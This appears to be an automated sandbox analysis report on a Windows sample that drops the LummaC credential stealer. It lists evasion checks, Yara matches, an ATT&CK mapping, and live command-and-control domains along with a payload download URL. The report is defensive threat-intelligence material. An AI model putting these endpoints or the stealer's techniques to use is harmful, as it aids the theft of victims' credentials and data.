Source: Amcache.hve.6.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.6.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe

Code function: 2_2_0043A9B0 LdrInitializeThunk,

2_2_0043A9B0

Source: C:\Users\user\Desktop\DG55Gu1yGM.exe

Code function: 0_2_0042A3D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0042A3D3

Source: C:\Users\user\Desktop\DG55Gu1yGM.exe

Code function: 0_2_0041EC5E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0041EC5E

Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_0042FE5F mov eax, dword ptr fs:[00000030h]	0_2_0042FE5F
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_004B0083 push dword ptr fs:[00000030h]	0_2_004B0083
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_021500C6 mov eax, dword ptr fs:[00000030h]	0_2_021500C6
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_0212092B mov eax, dword ptr fs:[00000030h]	0_2_0212092B
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_02120D90 mov eax, dword ptr fs:[00000030h]	0_2_02120D90
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_008D8B73 push dword ptr fs:[00000030h]	2_2_008D8B73
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024B092B mov eax, dword ptr fs:[00000030h]	2_2_024B092B
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024B0D90 mov eax, dword ptr fs:[00000030h]	2_2_024B0D90

Source: C:\Users\user\Desktop\DG55Gu1yGM.exe

Code function: 0_2_0043BBC1 GetProcessHeap,

0_2_0043BBC1

Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_0042A3D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0042A3D3
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_004104D3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_004104D3
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_00410666 SetUnhandledExceptionFilter,	0_2_00410666
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_0040F911 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0040F911
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_0214A63A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0214A63A
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_0213073A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0213073A
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_0212FB78 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0212FB78
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_021308CD SetUnhandledExceptionFilter,	0_2_021308CD

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: 8BB0.tmp.exe	String found in binary or memory: debonairnukk.xyz
Source: 8BB0.tmp.exe	String found in binary or memory: diffuculttan.xyz
Source: 8BB0.tmp.exe	String found in binary or memory: effecterectz.xyz
Source: 8BB0.tmp.exe	String found in binary or memory: deafeninggeh.biz
Source: 8BB0.tmp.exe	String found in binary or memory: immureprech.biz

Source: C:\Users\user\Desktop\DG55Gu1yGM.exe

Process created: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe "C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe"

Jump to behavior

Source: C:\Users\user\Desktop\DG55Gu1yGM.exe

Code function: 0_2_0041077B cpuid

0_2_0041077B

Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_0043B00A
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: GetLocaleInfoW,	0_2_004351C0
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: EnumSystemLocalesW,	0_2_0043B2CD
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: EnumSystemLocalesW,	0_2_0043B282
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: EnumSystemLocalesW,	0_2_0043B368
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_0043B3F5
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: GetLocaleInfoW,	0_2_0043B645
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_0043B76E
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: GetLocaleInfoW,	0_2_0043B875
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_0043B942
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: EnumSystemLocalesW,	0_2_00434DCD
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_0215B271
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: EnumSystemLocalesW,	0_2_02155034
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: GetLocaleInfoW,	0_2_02155427
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: EnumSystemLocalesW,	0_2_0215B4E9
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: EnumSystemLocalesW,	0_2_0215B534
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: EnumSystemLocalesW,	0_2_0215B5CF
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: GetLocaleInfoW,	0_2_0215BADC
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_0215BBA9
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: GetLocaleInfoW,	0_2_0215B8A3
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: GetLocaleInfoW,	0_2_0215B8AC
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_0215B9D5

Source: C:\Users\user\Desktop\DG55Gu1yGM.exe

Code function: 0_2_004103CD GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_004103CD

Source: C:\Users\user\Desktop\DG55Gu1yGM.exe

Code function: 0_2_004163EA GetVersionExW,Concurrency::details::platform::InitializeSystemFunctionPointers,Concurrency::details::WinRT::Initialize,__CxxThrowException@8,

0_2_004163EA

Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.6.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: 2.2.8BB0.tmp.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.8BB0.tmp.exe.2500000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.8BB0.tmp.exe.2500000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.8BB0.tmp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2195992842.0000000002500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: 2.2.8BB0.tmp.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.8BB0.tmp.exe.2500000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.8BB0.tmp.exe.2500000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.8BB0.tmp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2195992842.0000000002500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_004218CC Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,	0_2_004218CC
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_00420BF6 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,	0_2_00420BF6
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_02141B33 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,	0_2_02141B33
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_02140E5D Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,	0_2_02140E5D

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Native API	1 DLL Side-Loading	11 Process Injection	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Screen Capture	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Virtualization/Sandbox Evasion	LSASS Memory	1 Query Registry	Remote Desktop Protocol	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Process Injection	Security Account Manager	31 Security Software Discovery	SMB/Windows Admin Shares	3 Clipboard Data	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Deobfuscate/Decode Files or Information	NTDS	1 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	124 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	4 Obfuscated Files or Information	LSA Secrets	1 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	22 Software Packing	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	2 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	24 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
DG55Gu1yGM.exe	43%	Virustotal		Browse
DG55Gu1yGM.exe	42%	ReversingLabs	Win32.Rootkit.BootkitX
DG55Gu1yGM.exe	100%	Avira	HEUR/AGEN.1306956
DG55Gu1yGM.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	100%	Joe Sandbox ML

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://176.113.115.19/ScreenUpdateSync.exed	0%	Avira URL Cloud	safe
https://debonairnukk.xyz/apix	100%	Avira URL Cloud	malware
http://176.113.115.19/ScreenUpdateSync.exea	0%	Avira URL Cloud	safe
http://176.113.115.19/ScreenUpdateSync.exex	0%	Avira URL Cloud	safe
https://wrathful-jammy.cyou/api0	100%	Avira URL Cloud	malware
https://sordid-snaked.cyou/	100%	Avira URL Cloud	malware
https://post-to-me.com/track_prt.php?sub=0&cc=DEk	100%	Avira URL Cloud	malware
https://immureprech.biz/apiR	100%	Avira URL Cloud	malware
https://wrathful-jammy.cyou/H	100%	Avira URL Cloud	malware
https://sordid-snaked.cyou/api9	100%	Avira URL Cloud	malware
http://176.113.115.19/ScreenUpdateSync.exe$	0%	Avira URL Cloud	safe
http://176.113.115.19/ScreenUpdateSync.exeZ0	0%	Avira URL Cloud	safe
http://176.113.115.19/ScreenUpdateSync.exe0	0%	Avira URL Cloud	safe
http://176.113.115.19/ScreenUpdateSync.exeR8	0%	Avira URL Cloud	safe
https://diffuculttan.xyz/api5	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
post-to-me.com	104.21.56.70	true	false	high
steamcommunity.com	104.121.10.34	true	false	high
immureprech.biz	104.131.68.180	true	false	high
deafeninggeh.biz	45.77.249.79	true	false	high
sordid-snaked.cyou	unknown	unknown	false	high
diffuculttan.xyz	unknown	unknown	false	high
effecterectz.xyz	unknown	unknown	false	high
awake-weaves.cyou	unknown	unknown	false	high
wrathful-jammy.cyou	unknown	unknown	false	high
debonairnukk.xyz	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
sordid-snaked.cyou	false	high
deafeninggeh.biz	false	high
effecterectz.xyz	false	high
wrathful-jammy.cyou	false	high
https://steamcommunity.com/profiles/76561199724331900	false	high
awake-weaves.cyou	false	high
immureprech.biz	false	high
https://immureprech.biz/api	false	high
debonairnukk.xyz	false	high
diffuculttan.xyz	false	high
https://post-to-me.com/track_prt.php?sub=0&cc=DE	false	high
https://deafeninggeh.biz/api	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp	false		high
https://player.vimeo.com	8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/?subsection=broadcasts	8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp	false		high
https://debonairnukk.xyz/apix	8BB0.tmp.exe, 00000002.00000002.2550654344.000000000095B000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://store.steampowered.com/subscriber_agreement/	8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.gstatic.cn/recaptcha/	8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://wrathful-jammy.cyou/api0	8BB0.tmp.exe, 00000002.00000002.2550654344.000000000095B000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://176.113.115.19/ScreenUpdateSync.exea	DG55Gu1yGM.exe, 00000000.00000003.2164609961.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, DG55Gu1yGM.exe, 00000000.00000002.4557144801.00000000005C2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://176.113.115.19/ScreenUpdateSync.exed	DG55Gu1yGM.exe, 00000000.00000003.2164609961.00000000005C4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://176.113.115.19/ScreenUpdateSync.exe	DG55Gu1yGM.exe, DG55Gu1yGM.exe, 00000000.00000003.2164609961.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, DG55Gu1yGM.exe, 00000000.00000002.4557144801.00000000005C2000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.valvesoftware.com/legal.htm	8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en	8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.youtube.com	8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com	8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sordid-snaked.cyou/api9	8BB0.tmp.exe, 00000002.00000002.2550654344.000000000095B000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.0000000000922000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.0000000000922000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/	8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://176.113.115.19/ScreenUpdateSync.exex	DG55Gu1yGM.exe, 00000000.00000003.2164609961.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, DG55Gu1yGM.exe, 00000000.00000002.4557144801.00000000005C2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl	8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=Cx79WC7T	8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.0000000000922000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC	8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp	false		high
https://s.ytimg.com;	8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.0000000000922000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&	8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/	8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/fatalerror.css?v=OFUqlcDNiD6y&l=engli	8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp	false		high
https://steam.tv/	8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://post-to-me.com/track_prt.php?sub=&cc=DE	DG55Gu1yGM.exe, 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=foEB	8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000002.2550620400.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp	false		high
http://store.steampowered.com/privacy_agreement/	8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.0000000000922000.00000004.00000020.00020000.00000000.sdmp	false		high
https://wrathful-jammy.cyou/	8BB0.tmp.exe, 00000002.00000002.2550654344.000000000095B000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://immureprech.biz/apiR	8BB0.tmp.exe, 00000002.00000002.2550620400.0000000000917000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://store.steampowered.com/points/shop/	8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sketchfab.com	8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lv.queniujq.cn	8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.youtube.com/	8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://post-to-me.com/track_prt.php?sub=0&cc=DEk	DG55Gu1yGM.exe, 00000000.00000002.4557144801.0000000000591000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://store.steampowered.com/privacy_agreement/	8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp	false		high
https://post-to-me.com/track_prt.php?sub=	DG55Gu1yGM.exe	false		high
https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am	8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/recaptcha/	8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://checkout.steampowered.com/	8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://post-to-me.com/	DG55Gu1yGM.exe, 00000000.00000002.4557144801.0000000000591000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/;	8BB0.tmp.exe, 00000002.00000002.2550654344.00000000009B9000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000002.2550654344.000000000095B000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.00000000009B9000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://wrathful-jammy.cyou/H	8BB0.tmp.exe, 00000002.00000002.2550654344.000000000095B000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://store.steampowered.com/about/	8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp	false		high
https://steamcommunity.com/my/wishlist/	8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&	8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp	false		high
https://help.steampowered.com/en/	8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp	false		high
https://steamcommunity.com/market/	8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp	false		high
https://store.steampowered.com/news/	8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp	false		high
